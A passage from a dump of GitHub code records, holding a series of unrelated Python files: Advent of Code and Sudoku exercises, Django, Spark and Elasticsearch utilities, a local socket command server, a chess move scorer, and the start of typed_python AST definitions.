df_crypto['Cashback'].iloc[l+1] = df_crypto['Cashback'].iloc[l] + sum(gain_list)\n l += 1\n if l == S.shape[0]-1:\n break\n st.write(df_crypto['Cashback'])","repo_name":"Drosophobe/pyCrypto","sub_path":"src/StreamLitpyCrypto/tab5.py","file_name":"tab5.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14755442446","text":"# Day 5\n\nwith open(\"./input/input_5.txt\", 'r') as f:\n data = f.read().splitlines()\n\n# Part 1\n\nseat_dict = {}\nfor seat in data:\n row, col = 0, 0\n # lower and upper limit for row number\n ll, ul = 1, 128\n for letter in seat[:-3]:\n if letter == 'F':\n ul -= (ul - ll + 1) / 2\n elif letter == 'B':\n ll += (ul - ll + 1) / 2\n\n # assign row number\n # (-1 because seats are 0-indexed)\n row = int(ll) - 1\n\n ll, ul = 1, 8\n for letter in seat[-3:]:\n if letter == 'L':\n ul -= (ul - ll + 1) / 2\n elif letter == 'R':\n ll += (ul - ll + 1) / 2\n # assign column number\n # (-1 because seats are 0-indexed)\n col = int(ll) - 1\n seat_dict[row * 8 + col] = (row, col)\n\nhighest_seat_id = max(seat_dict.keys())\nprint(\"Part 1\")\nprint(\"Highest seat ID on a boarding pass: {}\\n\".format(highest_seat_id))\n\n# Part 2\nrequired_seat_id = 0\nSEAT_ID_LIST = list(seat_dict.keys())\nSEAT_ID_LIST.sort()\nfor idx in range(0, len(SEAT_ID_LIST) - 1):\n if SEAT_ID_LIST[idx + 1] == SEAT_ID_LIST[idx] + 2:\n required_seat_id = SEAT_ID_LIST[idx] + 1\n break\n\nprint(\"Part 2\")\nif required_seat_id:\n print(\"Required seat ID: {}\".format(required_seat_id))\nelse:\n print(\"Required seat ID not found.\")\nprint(SEAT_ID_LIST)\n","repo_name":"prajwalgatti/advent-of-code-2020","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34970873083","text":"from socket import *\nimport threading\nimport json\nimport sys\nfrom PyQt5.QtCore import Qt, pyqtSignal, QObject\nimport time\n\nfrom src.net.base.server import ServerListenerThread\n\n\nclass CommandListenerServer(ServerListenerThread):\n send_command = pyqtSignal(list, name=\"send_command\")\n\n def __init__(self, parent, config=None):\n super().__init__(parent, \"command\", config=config)\n self.send_command.connect(\n self.parent_behavior.queue_command, Qt.QueuedConnection\n )\n\n def run_thread(self):\n while True:\n successful = self.start_server()\n # retry server start if not successful\n if not successful:\n continue\n\n # do things while connected\n while self.connected:\n try:\n amount_received = 0\n while amount_received < 4096:\n data = self.conn.recv(4096).decode(\"utf-8\")\n\n if len(data) == 0:\n self.print(\"Empty data; closing socket!\")\n self.close_socket()\n break\n\n if data == \"end connection\":\n self.print(\"closing socket!\")\n self.close_socket()\n break\n\n try:\n data = json.loads(data)\n except:\n self.print(f\"Error decoding message: {data}\")\n break\n amount_received += len(data)\n self.print(f\"Received {data}\")\n\n self.send_command.emit(data)\n\n # send received message to unity\n try:\n message = \"received\"\n self.conn.sendall(message.encode(\"utf-8\"))\n except:\n self.print(f\"Error sending 'received' message!\")\n break\n\n except:\n self.print(\"Socket error!\")\n self.close_socket()\n break\n\n\n# class CommandListenerServer(QObject):\n\n# send_command = pyqtSignal(list, name=\"send_command\")\n\n# def __init__(self, parent, config=None):\n# print(\"COMSERVER: Starting command server!\")\n# super().__init__()\n# self.config = config\n# self.host = \"127.0.0.1\"\n# self.port = config[\"NETWORK\"][\"command_port\"] if config is not None else 13001\n# self.socket = socket(AF_INET, SOCK_STREAM)\n# self.parent_behavior = parent\n# self.send_command.connect(\n# self.parent_behavior.queue_command, Qt.QueuedConnection\n# )\n# self.connected = False\n\n# def run_thread(self):\n# print(\"COMSERVER: Started Thread!\")\n\n# while True:\n# try:\n# self.socket = socket(AF_INET, SOCK_STREAM)\n# self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n# self.socket.bind((self.host, self.port))\n# except:\n# print(f\"COMSERVER: {self.port} already in use!\")\n# if self.socket:\n# if self.connected:\n# self.socket.shutdown(1)\n# self.connected = False\n# self.socket.close()\n# self.socket = None\n# time.sleep(0.3)\n# continue\n\n# try:\n# self.socket.listen() # enable server to accept connections\n# print(\"COMSERVER: Waiting for connection...\")\n# self.conn, address = self.socket.accept() # wait for connection\n# print(f\"COMSERVER: Server connected by {address}\")\n# self.connected = True\n# while True:\n# try:\n# amount_received = 0\n# while True:\n# amount_received = 0\n# while amount_received < 4096:\n# data = self.conn.recv(4096)\n# try:\n# data = json.loads(data.decode(\"utf-8\"))\n# except:\n# print(\"COMSERVER: Error decoding message!\")\n# amount_received += len(data)\n# # print('COMSERVER: Received \"%s\"' % data)\n\n# self.send_command.emit(data)\n\n# except:\n# print(\"COMSERVER: Socket error!\")\n\n# if self.socket and not self.connected:\n# self.socket.shutdown(SHUT_WR)\n# self.socket.close()\n# self.connected = False\n# self.socket = None\n# break\n# except:\n# pass\n# finally:\n# print(\"COMSERVER: Closing socket\")\n# if self.socket and not self.connected:\n# self.socket.shutdown(SHUT_WR)\n# self.socket.close()\n# self.connected = False\n# self.socket = None\n\n\n# if __name__ == \"__main__\":\n\n# try:\n# s = CommandListenerServer()\n# thread = threading.Thread(target=s.run_thread)\n# thread.daemon = True\n# thread.start()\n# # thread.join()\n# while thread.is_alive():\n# thread.join(1) # not sure if there is an appreciable cost to this.\n\n# except (KeyboardInterrupt, SystemExit):\n# print(\"\\n! Received keyboard interrupt, quitting threads.\\n\")\n# s.socket.shutdown(\n# SHUT_RDWR\n# ) # SHUT_RDWR: further sends and receives are disallowed\n# s.socket.close()\n# sys.exit()\n","repo_name":"jotpio/behavior_HF","sub_path":"src/net/command_listener_server.py","file_name":"command_listener_server.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31085512468","text":"import cv2 as cv\nimport sys\nimport requests\nimport time\nimport threading\nfrom threading import Thread\nfrom queue import Queue\nfrom datetime import datetime\nfrom pathlib import Path\nfrom fe.settings import common as config\n\nclass Request_api (threading.Thread):\n \"\"\" \n \n The request_ api class is responsible for create thread for each graped frame.\n\n args:\n frame(obj): a byte of image\n framename(str): a timestanp used to named the frame\n thread_id(int): the id of a given thread\n t_Lock(:obj: int): the semaphore to control the number of threa opened\n save_frame(bool) : defin if the frame should be saved in disk or not. \n \n Attributes:\n frame(obj): a byte of image\n framename(str): a timestanp used to named the frame\n t_Lock(:obj: int): the semaphore to control the number of threa opened\n thread_id(int): the id of a given thread\n save_frame(bool) : defin if the frame should be saved in disk or not.\n \n Return:\n None\n \"\"\"\n\n def __init__(self, frame, framename, threadID, t_Lock, save_frame):\n threading.Thread.__init__(self, daemon=False) \n self.frame = frame\n self.framename = framename\n self.threadID = threadID\n self.t_Lock = t_Lock\n self.save_frame = save_frame\n self.start()\n \n def run (self):\n \n with self.t_Lock: \n\n print('Initialize thread -{thread_id} at {time} ' .format(thread_id =self.threadID, time= time.asctime()))\n \n self.imencoded = cv.imencode(config.IMG_FORMAT, self.frame)[1].tobytes()\n\n self.session = requests.Session()\n \n try:\n \n self.response = self.session.post(url= config.URL_API +'/'+ self.framename, data=self.imencoded)\n \n print(self.response.status_code) \n\n if self.save_frame:\n cv.imwrite(str(config.CORAL_DATA_DIR) +'/'+ self.framename + config.IMG_FORMAT, self.frame)\n with open(str(config.CORAL_DATA_DIR) +'/'+ self.framename + '.xml', 'wb') as f:\n f.write(self.response.content)\n print('Thread - {thread_id} Saved Frame & Anotation at {time} ' .format(thread_id =self.threadID, time= time.asctime()))\n \n except :\n self.response = requests.exceptions.RequestException\n if self.save_frame:\n cv.imwrite(str(config.CORAL_DATA_DIR) +'/'+ self.framename + config.IMG_FORMAT, self.frame)\n print('Thread - {thread_id} Only Saved Frame and Anotation Not Found at {time} ' .format(thread_id =self.threadID, time= time.ctime())) \n \n print('Exiting thread - {thread_id} at {time} ' .format(thread_id =self.threadID, time= time.asctime()))\n \n self.session.close()\n return None \n\n","repo_name":"CEPrE-Unilurio/ai4coral","sub_path":"microservices/fe/thread_request.py","file_name":"thread_request.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31210605538","text":"from django.core.management.base import BaseCommand\nfrom sightings.models import Squirrel\nimport csv\nfrom decimal import Decimal\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('args', nargs='*', type = str)\n def handle(self, *args, **kwargs):\n path = args[0]\n insertlist=[]\n with open(path,\"r\", encoding=\"utf-8\") as f:\n csv_reader = csv.reader(f)\n for row in csv_reader:\n for i in range(0,len(row)):\n if row[i]==\"false\":\n row[i]=False\n if row[i]==\"true\":\n row[i]=True\n date=row[5]\n newdate=date[-4:]+\"-\"+date[0:2]+\"-\"+date[2:4]\n try:\n squirrel = Squirrel(x=Decimal(row[0]), y=Decimal(row[1]),\n unique_squirrel_id=row[2], \n hectare=row[3],\n shift=row[4], \n date=newdate, \n hectare_squirrel_number=row[6], \n age=row[7],\n primary_fur_color=row[8], \n highlight_fur_color=row[9],\n combination_of_primary_and_highlight_color=row[10], \n color_notes=row[11],\n location=row[12],\n above_ground_sighter_measurement=row[13], \n specific_location=row[14],\n running=row[15], \n chasing=row[16], \n climbing=row[17], \n eating=row[18],\n foraging=row[19],\n other_activities=row[20], \n kuks=row[21], \n quaas=row[22],\n moans=row[23],\n tail_flags=row[24], \n tail_twitches=row[25], \n approaches=row[26],\n indifferent=row[27],\n runs_from=row[28], \n other_interactions=row[29], \n lat_long=row[30])\n insertlist.append(squirrel)\n except:\n continue\n Squirrel.objects.bulk_create(insertlist)\n\n\n","repo_name":"tonycao5/squirrel","sub_path":"sightings/management/commands/import_squirrel_data.py","file_name":"import_squirrel_data.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1786419769","text":"import sys\nsys.path.insert(0, '.')\n\nfrom twisted.web.microdom import parseString\nfrom twisted.web.domhelpers import findNodesNamed\nfrom exe.engine.path import Path\nimport json\nimport re\n\nif __name__ == '__main__':\n files = {'lomVocab': Path('exe') / 'webui' / 'schemas' / 'scorm2004' / 'common' / 'vocabValues.xsd',\n 'lomesVocab': Path('exe') / 'webui' / 'schemas' / 'scorm2004' / 'vocab' / 'lomesvocab.xsd'}\n response = ''\n vocab = {}\n for varname, f in files.items():\n document = parseString(f.bytes(), escapeAttributes=0)\n nodes = findNodesNamed(document, 'xs:simpletype')\n for node in nodes:\n name = node.getAttribute('name', str())\n enumerations = findNodesNamed(node, 'xs:enumeration')\n vocab[name] = []\n for enumeration in enumerations:\n vocab[name].append([enumeration.getAttribute('value'), '_(%s)' % enumeration.getAttribute('value')])\n response += '%s = %s;\\n\\n' % (varname, json.dumps(vocab, indent=4).encode('utf-8'))\n outfile = Path('exe') / 'jsui' / 'scripts' / 'lomvocab.js'\n response = re.sub('\"_\\(', '_(\"', response)\n response = re.sub('\\)\"', '\")', response)\n outfile.write_bytes(response)\n","repo_name":"exelearning/iteexe","sub_path":"tools/genlomvocabjs.py","file_name":"genlomvocabjs.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"61"} +{"seq_id":"40738155140","text":"import json\n\nimport pytest\nfrom elasticsearch import AsyncElasticsearch\n\nfrom settings import settings\nfrom testdata.es_shemas import ES_SHEMAS\n\n\n@pytest.fixture(scope='session')\nasync def es_client():\n client = AsyncElasticsearch(hosts=[settings.elastic_dsn])\n yield client\n await client.close()\n\n\n@pytest.fixture(autouse=True)\nasync def es_init(es_client: AsyncElasticsearch):\n \"\"\"Создаёт индексы для каждого теста и удаляет после завершения.\"\"\"\n for index in ES_SHEMAS:\n await es_client.indices.create(index, body=ES_SHEMAS[index])\n\n yield\n\n for index in ES_SHEMAS:\n await es_client.indices.delete(index)\n\n\n@pytest.fixture\ndef es_write_data(es_client: AsyncElasticsearch):\n async def inner(index: str, data: list[dict]):\n bulk_query = []\n for row in data:\n bulk_query.extend([\n json.dumps({'index': {'_index': index, '_id': row['id']}}),\n json.dumps(row)\n ])\n\n str_query = '\\n'.join(bulk_query) + '\\n'\n\n if not await es_client.indices.exists(index):\n raise Exception(\n f'Перед записью данных в индекс {index} его надо '\n f'инициализировать при помощи фикстуры es_{index}_index'\n )\n response = await es_client.bulk(str_query, refresh=True)\n if response['errors']:\n raise Exception('Ошибка записи данных в Elasticsearch')\n\n return inner\n","repo_name":"latiennetendresse/Async_API_sprint_2","sub_path":"fastapi-solution/tests/functional/fixtures/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11260831110","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('customers/', views.customers, name='customers'),\n path('customer//', views.customer, name=\"customer\"),\n path('create_customer/', views.createCustomer, name=\"create_customer\"),\n path('update_customer//', views.updateCustomer, name=\"update_customer\"),\n path('delete_customer//', views.deleteCustomer, name=\"delete_customer\"), \n path('register/', views.registerPage, name='register'),\n path('login/', views.loginPage, name='login'),\n\n path('sendwa/', views.sendwa, name=\"send_wa\"),\n\n path('pdf_view/', views.ViewPDF.as_view(), name=\"pdf_view\"),\n path('pdf_download/', views.DownloadPDF.as_view(), name=\"pdf_download\"),\n\n path('create_device/', views.create_device, name=\"create_device\"),\n path('devices/', views.devices, name='devices'),\n]","repo_name":"YusufCandraArif/crmwaahass","sub_path":"crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4734100252","text":"from dataclasses import dataclass\nfrom typing import List, Set, Callable, Tuple\nimport warnings\nimport chess\nimport chess.engine\nfrom reconchess import is_psuedo_legal_castle\nfrom reconchess.utilities import capture_square_of_move\n\nfrom Fianchetto.utilities import simulate_move\nimport numpy as np\n\nfrom lczero.backends import Weights, Backend, GameState\nfrom scipy.special import softmax as softmax\nfrom termcolor import colored\nwarnings.simplefilter(\"error\", RuntimeWarning)\n# get better sneak rewards\n@dataclass\nclass ScoreConfig:\n capture_king_score: float = 200 # bonus points for a winning move\n checkmate_score: int = 120 # point value of checkmate\n stalemate_score: int = 80 # point value of stalemate\n into_check_score: float = -160 # point penalty for moving into check\n search_depth: int = 8 # Stockfish engine search ply\n reward_attacker: float = 1.5 # Bonus points if move sets up attack on enemy king\n require_sneak: bool = True # Only reward bonus points to aggressive moves if they are sneaky (aren't captures)\n far_away_defense_score: float = 0.5 #Bonus points for protecting against check from far away with support (fads)\n\n\ndef map_uci(uci: str, board: chess.Board = None):\n \"\"\"Returns standard UCI moves (including castling) when board is also given\"\"\"\n if board and board.piece_at(chess.parse_square(uci[:2])).piece_type is chess.KING:\n if uci == \"e8h8\":\n return map_uci(\"e8g8\")\n elif uci == \"e8a8\":\n return map_uci(\"e8c8\")\n elif uci == \"e1h1\":\n return map_uci(\"e1g1\")\n elif uci == \"e1a1\":\n return map_uci(\"e1c1\")\n else:\n return map_uci(uci)\n else:\n return chess.Move.from_uci(uci)\n\ndef calculate_score(b,\n board_fen,\n moves: List[chess.Move],\n score_config: ScoreConfig = ScoreConfig()):\n\n # pov = board.turn\n\n # if next_board.was_into_check():\n # return score_config.into_check_score\n board = chess.Board(board_fen)\n pov = board.turn\n game = GameState(fen=board_fen)\n inp = game.as_input(b)\n out = b.evaluate(inp)[0]\n q = out.q()\n raw_scores_c = {map_uci(uci, board): score for uci, score in zip(game.moves(), out.p_raw(*game.policy_indices()))}\n\n if len(raw_scores_c) > 0:\n least_score = min(raw_scores_c.values())\n else:\n raw_scores_rbc = [0]*len(moves)\n raw_scores_rbc[moves.index(chess.Move.null())] = 10\n print(colored(f'No moves in this board (q = {q}):', 'red'))\n print(board_fen)\n return q, raw_scores_rbc, moves\n\n raw_scores_rbc = [-2*abs(least_score)]*len(moves)\n revised = {}\n\n\n for i, move in enumerate(moves):\n # print(move)\n if move != chess.Move.null() and not is_psuedo_legal_castle(board, move):\n # print('first if')\n if not board.is_pseudo_legal(move):\n # check for sliding move alternate results, and score accordingly\n revised_move = simulate_move(board, move)\n if revised_move is not None:\n revised[i] = moves.index(revised_move)\n else:\n if board.is_check():\n raw_scores_rbc[i] = score_config.into_check_score\n else:\n raw_scores_rbc[i] = -2*abs(least_score)\n continue\n elif board.is_capture(move):\n if board.piece_at(capture_square_of_move(board, move)).piece_type is chess.KING:\n raw_scores_rbc[i] = score_config.capture_king_score\n q = 1\n break\n elif move == chess.Move.null():\n if board.is_check():\n raw_scores_rbc[i] = score_config.into_check_score\n else:\n raw_scores_rbc[i] = -2*abs(least_score)\n continue\n\n next_board = board.copy()\n next_board.push(move)\n next_board.clear_stack()\n if next_board.was_into_check():\n raw_scores_rbc[i] = score_config.into_check_score\n elif next_board.is_checkmate():\n raw_scores_rbc[i] = score_config.checkmate_score\n else:\n if board.was_into_check(): \n king_attackers = board.attackers(not pov, board.king(pov)) # list of squares/pieces that attack our king\n for square in king_attackers: \n if ((board.piece_type_at(square)==3) or (board.piece_type_at(square)==4) or (board.piece_type_at(square)==5)): # 3->Bishop, 4->Rook, 5->Queen\n support=next_board.attackers(pov,move.to_square)\n opposition=next_board.attackers(not pov,move.to_square)\n if len(list(support))>=len(list(opposition)):\n if chess.square_distance(move.to_square,board.king(pov))>2:\n raw_scores_rbc[i]=score_config.far_away_defense_score\n break\n\n # print('getting from neural')\n if move in raw_scores_c:\n raw_scores_rbc[i] += raw_scores_c[move]\n\n if next_board.is_stalemate():\n raw_scores_rbc[i]+=score_config.stalemate_score\n\n # Add bonus board position score if king is attacked\n king_attackers = next_board.attackers(pov, next_board.king(not pov)) # list of pieces that can reach the enemy king\n if king_attackers: # if there are any such pieces...\n if not score_config.require_sneak: # and we don't require the attackers to be sneaky\n raw_scores_rbc[i] += score_config.reward_attacker # add the bonus points\n # or if we do require the attackers to be sneaky, either the last move was not a capture (which would give away\n # our position) or there are now attackers other than the piece that moves (discovered check)\n elif not next_board.is_capture(move) or any([square != move.to_square for square in king_attackers]):\n raw_scores_rbc[i] += score_config.reward_attacker # add the bonus points\n\n if len(king_attackers)==1:\n square = king_attackers.pop()\n support=next_board.attackers(pov,square)\n opposition=next_board.attackers(not pov,square)\n if len(list(support)) 0.5:\n y_prediction[x] = 1\n else:\n y_prediction[x] = 0\n\n # return predictions:\n return y_prediction.tolist()\n\n\n#No solvers for quadratic discrimination\ndef apply_quad_disc(train_x, train_y, test_x):\n # apply Linear Regression:\n qda = QuadraticDiscriminantAnalysis()\n qda.fit(train_x, train_y)\n\n # predict the results:\n y_prediction = qda.predict(test_x)\n\n # cast the results to 0 ant 1:\n for x, data in enumerate(y_prediction):\n if data > 0.5:\n y_prediction[x] = 1\n else:\n y_prediction[x] = 0\n\n # return predictions:\n return y_prediction.tolist()\n","repo_name":"suong4554/Machine-Learning-Poly-U","sub_path":"ML_Group_Project/scripts/discrimAnalAlgo.py","file_name":"discrimAnalAlgo.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15343083771","text":"def choice(val):\r\n if val==1:\r\n count_no_of_vowels(string)\r\n elif val==2:\r\n sum_of_digits(string)\r\n elif val==3:\r\n special_char_count(string)\r\n print(\"-\"*72)\r\n \r\ndef count_no_of_vowels(string):\r\n count=0\r\n for alphabet in string:\r\n if alphabet.lower() in [\"a\",\"e\",\"i\",\"o\",\"u\"]:\r\n count+=1\r\n print(\" Total no of vowels :\",count)\r\n \r\ndef sum_of_digits(string):\r\n total=0\r\n for char in string:\r\n if char.isnumeric():\r\n total+=int(char)\r\n else:\r\n continue\r\n print(\" Sum of digits :\",total)\r\n\r\ndef special_char_count(string):\r\n total=0\r\n for char in string:\r\n if char.isalnum():\r\n continue\r\n else:\r\n total+=1\r\n print(\" Total no of characters :\",total)\r\n\r\nprint(\"|-------------------------EXPERIMENT NO.23-----------------------------|\")\r\nprint(\"| REMOVING A SPECIFIED CHARACTER FROM THE STRING |\")\r\nprint(\"|----------------------------------------------------------------------|\")\r\nstring=input(\" Enter a string : \")\r\nprint(\"*\"*72)\r\nval=int(input(\" Enter your choice: \"))\r\nwhile val!=4:\r\n choice(val)\r\n print(\"1. Count number of vowels\")\r\n print(\"2. Find sum of digits\")\r\n print(\"3. Count special characters\")\r\n print(\"4. Exit\")\r\n val=int(input(\" Enter your choice: \"))\r\n","repo_name":"wizexplorer/string-methods-python","sub_path":"string_methods.py","file_name":"string_methods.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21834446386","text":"import random\nfrom termcolor import colored\nfrom validador import tiene_repeticiones, validar_rango_numero, sudoku_esta_lleno\nimport os\n\npistas_restantes = 3\n\ndef creador_tablero(ruta_archivo):\n archivo = open(ruta_archivo, 'r')\n set = archivo.readlines()\n nro_tablero_elegido = random.randint(0, len(set)-1)\n tablero_elegido = set[nro_tablero_elegido]\n caracteres = tablero_elegido.strip().split(',')\n tablero_final = []\n i = 0\n fila = []\n for caracter in caracteres:\n if caracter == '?':\n celda = {'numero': caracter, 'editable': True}\n else:\n celda = {'numero': caracter, 'editable': False}\n fila.append(celda)\n i += 1\n if i == 9:\n tablero_final.append(fila)\n fila = []\n i = 0\n return tablero_final\n\ndef elegir_dificultad():\n print(\"¡Bienvenido a Sudoku!\")\n print(\"Para iniciar el juego, por favor elija la dificultad\")\n print(\"1) Facil\")\n print(\"2) Normal\")\n print(\"3) Dificil\\n\")\n opcion = input(\"Ingrese la dificultad elegida: \")\n \n while(not validar_rango_numero(opcion, 1, 3)):\n opcion = input(\", por favor, intenta de nuevo: \")\n\n if opcion == '1':\n print(\"\\nHas seleccionado la dificultad Facil. A continuación se muestra el sudoku a resolver:\\n\")\n return \"setsudokus/set_facil.txt\"\n elif opcion == '2':\n print(\"\\nHas seleccionado la dificultad Normal. A continuación se muestra el sudoku a resolver:\\n\")\n return \"setsudokus/set_medio.txt\"\n elif opcion == '3':\n print(\"\\nHas seleccionado la dificultad Dificil. A continuación se muestra el sudoku a resolver:\\n\")\n return \"setsudokus/set_dificil.txt\"\n\ndef mostrar_tablero(tablero):\n i = 0\n print(colored(\" 1 2 3 4 5 6 7 8 9\", 'blue'))\n for linea in tablero:\n print(colored(int(i/9 + 1), 'blue') + \" | \", end=\"\")\n for elemento in linea:\n if (i%3 == 0) and (i != 0) and (i%9 != 0):\n print(\"| \", end = \"\")\n if elemento[\"editable\"] :\n print(elemento[\"numero\"], end= \" \")\n else:\n print(colored(elemento[\"numero\"],'red'), end= \" \")\n i += 1\n if i in (27, 54):\n print(\"\\n \" + \"-\" * 22)\n else:\n print(\"\") \n\ndef elegir_opcion_menu(sudoku):\n print(\"\\n1) Ingresar número\")\n print(\"2) Pedir una pista\")\n print(\"3) Limpiar el tablero\")\n print(\"4) Finalizar juego\\n\")\n opcion = input(\"Ingrese la opcion elegida: \")\n \n while(not validar_rango_numero(opcion, 1, 4)):\n opcion = input(\", por favor, intenta de nuevo: \")\n \n if opcion == '1':\n agregar_numero(sudoku)\n elif opcion == '2':\n dar_pista(sudoku)\n elif opcion == '3':\n limpiar_tablero(sudoku)\n elif opcion == '4':\n finalizar(sudoku)\n return False\n return True\n\ndef agregar_numero(tablero):\n coordenada_ingresada = input(\"Ingrese una coordenada\\n(debe ser un numero entre el 11 y el 99 donde el 1er numero es la fila y el 2do la columna): \")\n numero_ingresado = input(\"Ingrese un numero entre el 1 y el 9: \")\n if (len(coordenada_ingresada) == 2 and coordenada_ingresada[0].isdigit() and coordenada_ingresada[1].isdigit() and int(coordenada_ingresada[0]) > 0 and int(coordenada_ingresada[1]) > 0):\n # El -1 es porque la coordenada de la posicion 1x1 en la matriz es la posicion 0x0.\n fila = int(coordenada_ingresada[0]) - 1\n columna = int(coordenada_ingresada[1]) - 1\n if (numero_ingresado.isdigit() and len(numero_ingresado) == 1 and int(numero_ingresado) > 0):\n if tablero[fila][columna]['editable']:\n tablero[fila][columna]['numero'] = numero_ingresado\n else:\n print('\\nLa coordenada ' +\n coordenada_ingresada[0] + 'x' + coordenada_ingresada[1] + ' no puede ser modificada.')\n else:\n print('\\nEl numero ingresado ' +\n numero_ingresado + ' no es un numero valido.')\n else:\n print('\\nLa coordenada ' + coordenada_ingresada +\n ' no es una coordenada valida.')\n\ndef dar_pista(tablero):\n global pistas_restantes\n if pistas_restantes <= 0:\n print(\"No quedan pistas disponibles.\")\n return\n \n if tiene_repeticiones(tablero):\n pistas_restantes -= 1\n else:\n print(\"El sudoku no tiene repeticiones.\")\n \n print(f\"Pistas restantes: {pistas_restantes}\\n\")\n\ndef limpiar_tablero(tablero):\n for linea in tablero:\n for celda in linea:\n if celda['editable']:\n celda['numero'] = '?'\n\ndef finalizar(sudoku):\n if not tiene_repeticiones(sudoku) and sudoku_esta_lleno(sudoku):\n print(\"¡Felicitaciones! Has completado el sudoku correctamente.\\n\")\n else:\n print(\"¡Lo sentimos! El sudoku es incorrecto.\\n\")\n print(\"¡Muchas gracias por jugar a Sudoku!\")\n\ndef main():\n clear = lambda: os.system('cls')\n clear()\n ruta_archivo_set = elegir_dificultad()\n sudoku = creador_tablero(ruta_archivo_set)\n condicion = True\n while(condicion):\n mostrar_tablero(sudoku)\n condicion = elegir_opcion_menu(sudoku)\n\nif __name__ == \"__main__\":\n main()","repo_name":"JuampiCarosi/aninfo","sub_path":"proyecto.py","file_name":"proyecto.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9535360198","text":"from operator import itemgetter\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import expr, count\nimport sys,logging\nfrom datetime import datetime\nimport pandas as pd\n\n# Logging configuration\nformatter = logging.Formatter('[%(asctime)s] %(levelname)s @ line %(lineno)d: %(message)s')\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.INFO)\nhandler.setFormatter(formatter)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogger.addHandler(handler)\ndt_string = datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\nAppName = \"Progetto 1 SABD\"\n\ndef parse_map(f):\n x=f.split(sep=\",\")\n return [x[4]+'.'+x[0], x[3], x[2]]\n\ndef variazione(f):\n daily_events = sorted(list(f[1]), key=itemgetter(1))\n var = float(daily_events[len(daily_events)-1][2])-float(daily_events[0][2])\n splitted = f[0].split(sep='.')\n return [splitted[0], splitted[2], var, 2]\n\n\ndef main():\n\n #Creazione dello Spark Context\n spark = SparkSession.builder.appName(AppName+\"_\"+str(dt_string)).getOrCreate()\n spark.sparkContext.setLogLevel(\"ERROR\")\n logger.info(\"Starting spark application\")\n\n #Lettura del dataset da HDFS e trasformazione in dataframe\n logger.info(\"Reading CSV File\")\n df = spark.sparkContext.textFile(\"hdfs://master:54310/cartellaNIFI/out500_combined+header.csv\")\\\n .map(parse_map)\\\n .groupBy(lambda f:f[0])\\\n .filter(lambda f:len(f[1])>1)\\\n .map(variazione)\\\n .toDF(schema=[\"data\", \"borsa\", \"valore\", \"count\"])\n \n #Calcolo percentili e eventi considerati con i dataframe\n df = df.groupBy(['data', 'borsa']).agg(expr(\"percentile_approx(valore, 0.25)\").alias('Percentile25th'),\\\n expr(\"percentile_approx(valore, 0.50)\").alias('Percentile50th'),\\\n expr(\"percentile_approx(valore, 0.75)\").alias('Percentile75th'),\\\n expr(\"sum(count) as total_count\").alias('total_count'))\\\n .coalesce(1).write.mode('overwrite').option('header','true').csv(\"hdfs://master:54310/cartellaResult/Query3Result\")\n \n #pd.DataFrame(df.collect()).to_csv(\"hdfs://master:54310/cartellaResult/Query3Result\", header=True)\n \n spark.stop()\n return None\n\nif __name__ == '__main__':\n main()\n sys.exit()\n","repo_name":"kobero98/SABD_Progetto1","sub_path":"Spark_scripts/query3_df.py","file_name":"query3_df.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15764657884","text":"import sys\nimport ast\nimport typed_python.compiler.python_ast_util as python_ast_util\nimport types\nimport traceback\n\nfrom typed_python._types import Forward, Alternative, TupleOf, OneOf\n\n\n# forward declarations.\nModule = Forward(\"Module\")\nStatement = Forward(\"Statement\")\nExpr = Forward(\"Expr\")\nArg = Forward(\"Arg\")\nNumericConstant = Forward(\"NumericConstant\")\nExprContext = Forward(\"ExprContext\")\nBooleanOp = Forward(\"BooleanOp\")\nBinaryOp = Forward(\"BinaryOp\")\nUnaryOp = Forward(\"UnaryOp\")\nComparisonOp = Forward(\"ComparisonOp\")\nComprehension = Forward(\"Comprehension\")\nExceptionHandler = Forward(\"ExceptionHandler\")\nArguments = Forward(\"Arguments\")\nKeyword = Forward(\"Keyword\")\nAlias = Forward(\"Alias\")\nWithItem = Forward(\"WithItem\")\nTypeIgnore = Forward(\"TypeIgnore\")\n\nModule = Module.define(Alternative(\n \"Module\",\n Module={\n \"body\": TupleOf(Statement),\n **({\"type_ignores\": TupleOf(TypeIgnore)} if sys.version_info.minor >= 8 else {})\n },\n Expression={'body': Expr},\n Interactive={'body': TupleOf(Statement)},\n Suite={\"body\": 